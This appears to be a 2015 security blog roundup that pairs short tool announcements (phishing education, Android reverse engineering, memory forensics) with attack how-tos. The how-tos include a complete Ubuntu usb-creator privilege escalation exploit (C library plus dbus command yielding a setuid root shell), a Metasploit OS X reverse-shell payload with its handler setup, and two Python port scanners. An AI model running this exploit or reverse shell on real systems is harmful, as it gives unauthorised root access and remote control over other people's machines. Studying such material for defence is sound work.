Apr 25, 2015

Tools: Sptoolkit Rebirth - Phishing Education Toolkit

The spt (rebirth) project is an open source phishing education toolkit that aims to help in securing the mind as opposed to securing computers. Organizations spend billions of dollars annually in an effort to safeguard information systems, but spend little to nothing on the under trained and susceptible minds that operate these systems, thus rendering most technical protections instantly ineffective. A simple, targeted link is all it takes to bypass the most advanced security protections. The link is clicked, the deed is done.

spt was developed from the ground up to provide a simple and easy to use framework to identify your weakest links so that you can patch the human vulnerability. If the spt project sounds interesting to you, please consider downloading it for evaluation in your own organization. Feedback is welcomed and always appreciated.
The Basics
  1. Create and configure the MySQL database. spt needs a MySQL database to house its data, so create that database and a dedicated user account for it, granting the account ALL PRIVILEGES on that database only (scope the grant to the spt database, not to the whole server). Record the database name, user name and password in a safe place; you'll need them shortly to install spt.
  2. Ensure you have PHP 5.4
  3. Extract the spt files from the archive.
  4. Create a new directory on your web server, such as "spt" and upload the files to the directory.
Install spt
  1.  Open your web browser and navigate to the location where you uploaded the files and browse to install.php. For example, http://www.myhost.com/spt/install.php. If you accidentally just go to the root of the folder you placed the files in, you will be prompted to start the installation by clicking the right pointing arrow.
  2. When prompted to accept the GNU General Public License, click the "I Agree!" button. For reference, you can read the full text of the license in the license.htm file included in the root of the extracted files.
  3. On the next page, you will get feedback on the readiness of your server to install the spt. You can learn more about any failed items by hovering over the icon. Click the “Proceed!” button if all checks passed, or click the “Proceed Anyways” button if one of the checks failed and you have verified that the spt installer is reporting incorrectly.
  4. On the next page, you will need to provide those database details from earlier. The default server and database ports are provided, be sure to change them if your installation will require something else. Enter in the remaining required information and click the "Install Database!" button to get things moving along.
  5. If all goes well, you will see a listing of tables that have been successfully created. Click "Continue!" to move on.
  6. If instead you see an error indicated, click the "<back" button to go back and enter the database information again.
  7. Now it's time to create your first user, for you! Enter your first and last name, email address and password and click the "Create User" button to continue on.
  8. If you receive any errors, such as for an invalid email address or a password that does not meet the complexity requirements, click the "<back" button and try it again.
  9. Once you enter the required information successfully, you will receive confirmation. Click the "Proceed to Login" button to get logged into the spt!
  10. Now it's time to login using the email address and password you entered in the previous step. See, that was easy!
Source:: http://www.kitploit.com/2015/04/sptoolkit-rebirth-phishing-education.html

Tools: CodeInspect - Reverse-Engineering Tool for Android and Java Bytecode

Developing an Android application in an IDE is very convenient: features like code completion, Open Declaration, renaming variables and searching files help the developer a lot, and debugging in particular is one of the most important IDE features. Usually all of those features are available only for source code, not for bytecode, because they are meant to support the developer rather than a reverse engineer. Yet all of them would be just as helpful when reverse-engineering Android or Java applications. This is why we came up with a new reverse-engineering framework that works on the intermediate representation Jimple and supports all the features above and many more. In the following we give a detailed description of CodeInspect and its features.
CodeInspect accepts as input a complete Android Application Package (apk), a bare Android bytecode file (dex) or a jar file. In the following we describe the different features using a malicious Android apk.

Source:: http://sseblog.ec-spride.de/2014/12/codeinspect/

Apr 24, 2015

Tools: VolDiff: Malware Memory Footprint Analysis

1. Capture a memory dump of a clean Windows system and save it as "baseline.raw". This image will serve as the baseline for the analysis.
2. Execute your malware sample on the same system, then take a second memory dump and save it as "infected.raw".
3. Run VolDiff:

Source:: http://seclist.us/voldiff-malware-memory-footprint-analysis.html

Tools: ShadowOS - Test Android Vuln by HP

What is ShadowOS
     ShadowOS is a free tool designed by Fortify on Demand to help security and QA teams test Android applications for security vulnerabilities. It is a custom OS based on Android KitKat that intercepts specific areas of the device's operation and makes testing apps for security vulnerabilities easier. The OS runs as an emulator image, so no hardware is required.

How Does it Work
     ShadowOS contains a custom Android emulator image that communicates with a Windows Monitor application. Simply install the app you want to test on the emulator and exercise it. As the app runs, events show up in the monitor application in real time, which takes the guesswork out of your security assessment. Because ShadowOS is a modified build of the Android source code, it captures HTTPS traffic inside the platform before it is encrypted. This lets you see the SSL traffic even when the mobile application pins certificates, which is exactly where proxying the traffic with other tools usually fails.

Source:: http://h30499.www3.hp.com/t5/Fortify-Application-Security/Announcing-ShadowOS/ba-p/6725771#.VTkAS01FAiR?hootPostID=4492cf0a16bb7d39901d84d0ebbe8395

Apr 23, 2015

Ubuntu Privilege Escalation via usb-creator (fixed in Ubuntu 15.04)

(I tried it on Ubuntu Desktop 14.04.2 but it did not work for me. I'm not sure which version works with this exploit.)

Note:: "on a fresh install of Ubuntu 14.04 LTS desktop, the PoC doesn't work because dbus needs a "kvm" in its PATH. The PoC works if you install qemu-kvm (which brings /usr/bin/kvm) or if dbus has any "kvm" binary in its PATH"
From:: http://www.reddit.com/r/netsec/comments/33kmyt/ubuntu_local_privilege_escalation_posted_to/

1. Create test.c. The constructor runs the moment the library is loaded, so whatever loads it with root privileges makes /tmp/test root-owned and setuid:
#include <sys/stat.h>
#include <unistd.h>
void __attribute__((constructor)) init (void) {
    chown("/tmp/test", 0, 0);   /* make /tmp/test root-owned */
    chmod("/tmp/test", 04755);  /* and setuid root */
}

2. Compile it as a shared library. Every step below runs as an unprivileged user; no root prompt is needed.
$ gcc -shared -fPIC -o /tmp/test.so test.c

3. Copy sh to /tmp. This is the binary the preloaded library will turn into a setuid-root shell. (Ubuntu's /bin/sh is dash, which keeps an effective uid of 0; if you copy bash instead, it has to be started with -p or it drops the privileges.)
$ cp /bin/sh /tmp/test

4. Ask the usb-creator helper over the system bus to run its KVMTest method with a caller-supplied environment. The helper runs as root and passes the dictionary, LD_PRELOAD included, through to the kvm process it spawns, so /tmp/test.so is loaded with root privileges (hence the note above that a "kvm" binary must be in the helper's PATH).
$ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator /com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"

5. Run /tmp/test. If step 4 worked, it is now root-owned and setuid, and you get a root shell.
$ /tmp/test

This was fixed in Ubuntu 15.04.

Source:: http://www.openwall.com/lists/oss-security/2015/04/22/12

Apr 21, 2015

Tools: Rekall - The Most Complete Memory Analysis Framework

The Rekall Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples. The extraction techniques are performed completely independently of the system being investigated, yet offer visibility into the runtime state of that system. The framework is intended to introduce people to the techniques and complexities associated with extracting digital artifacts from volatile memory samples and to provide a platform for further work in this exciting area of research.

Source:: http://www.kitploit.com/2015/04/rekall-most-complete-memory-analysis.html

Howto: Remote Shell On Mac

Generate the raw reverse-shell payload (fill in LHOST with the address of the listening host):

- msfpayload osx/x86/shell_reverse_tcp LHOST= LPORT=4444 R > osxv

Then start a matching handler in msfconsole before running the payload on the target:

msf> use exploit/multi/handler
msf exploit(handler) > set payload osx/x86/shell_reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit

Python: Port Scanning

#!/usr/bin/env python
# TCP connect scan of a fixed port list with a simple banner grab (Python 2)
import socket

target = raw_input("Target: ")
ports = [22, 80, 443, 8000]
#max_port=raw_input("Maximum port to scan: ")
for port in ports:
        print "============================================"
        print "Scanning " + target + ":" + str(port)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(2)          # do not hang forever on filtered ports
        try:
                s.connect((target, port))
                print "Port " + str(port) + " open"
                s.send('Testing scan port \r\n')
                banner = s.recv(1024)
                if banner:
                        print "Banner: " + banner.strip()
        except socket.error:
                pass             # closed, filtered or no banner within the timeout
        s.close()
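The scanner above only handles a fixed list of ports, scans them one at a time and cannot tell a refused connection from one that silently timed out. The Python 3 script below is an added example, not code from the original page: it generalises the same connect-scan idea to a port spec such as "22,80,8000-8010", probes ports concurrently, distinguishes open, closed and filtered results, and grabs banners both from services that speak first (SSH, SMTP) and from ones that only answer after input (HTTP). It uses the standard library only; the loopback listener at the end is constructed purely for self-testing and is not a real service.

```python
#!/usr/bin/env python3
"""Threaded TCP connect scanner with banner grabbing.
Added example, not from the original page; standard library only."""
import socket
import sys
import threading
from concurrent.futures import ThreadPoolExecutor


def parse_ports(spec):
    """Expand "22,80,8000-8010" into a sorted list of ports.
    Rejects malformed ranges and anything outside 1-65535."""
    ports = set()
    for part in spec.split(","):
        part = part.strip()
        if not part:
            continue
        if "-" in part:
            lo, hi = (int(x) for x in part.split("-", 1))
            if lo > hi:
                raise ValueError("bad range: %s" % part)
            ports.update(range(lo, hi + 1))
        else:
            ports.add(int(part))
    for p in ports:
        if not 1 <= p <= 65535:
            raise ValueError("port out of range: %d" % p)
    return sorted(ports)


def probe(target, port, timeout=1.0):
    """TCP connect to target:port; returns (port, state, banner).
    state: "open" (handshake completed), "closed" (refused/RST) or
    "filtered" (connect timed out)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((target, port))
    except socket.timeout:
        s.close()
        return port, "filtered", ""
    except OSError:
        s.close()
        return port, "closed", ""
    banner = b""
    try:
        # Services like SSH/SMTP/FTP talk first; give them a moment, then
        # nudge the silent ones (HTTP etc.) with a CRLF and read again.
        try:
            banner = s.recv(1024)
        except socket.timeout:
            s.sendall(b"\r\n")
            try:
                banner = s.recv(1024)
            except socket.timeout:
                banner = b""
    except OSError:
        pass  # reset mid-read: still an open port, just no banner
    finally:
        s.close()
    return port, "open", banner.decode("ascii", "replace").strip()


def scan(target, spec, workers=64, timeout=1.0):
    """Probe every port in spec concurrently; returns {port: (state, banner)}."""
    ports = parse_ports(spec)
    with ThreadPoolExecutor(max_workers=min(workers, len(ports) or 1)) as pool:
        return {p: (st, b) for p, st, b in
                pool.map(lambda p: probe(target, p, timeout), ports)}


def start_fake_service(banner, speaks_first=True):
    """Constructed loopback listener for self-testing; returns its port.
    speaks_first=False models a server that only answers after input."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            conn, _ = srv.accept()
            if not speaks_first:
                conn.recv(64)
            conn.sendall(banner)
            conn.close()
    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    spec = sys.argv[2] if len(sys.argv) > 2 else "22,80,443,8000"
    for port, (state, banner) in sorted(scan(target, spec).items()):
        if state != "closed":
            print("%s:%d %s %s" % (target, port, state, banner))
```

Run it as `python3 scan.py 10.0.0.5 22,80,443,8000-8010`. Only "open" and "filtered" ports are printed; a filtered result means the SYN got no answer within the timeout, which on a host you can otherwise reach usually points at a firewall rather than an absent service. Keep the worker count modest against production hosts: a few hundred parallel connects is enough to trip rate limits and IDS signatures.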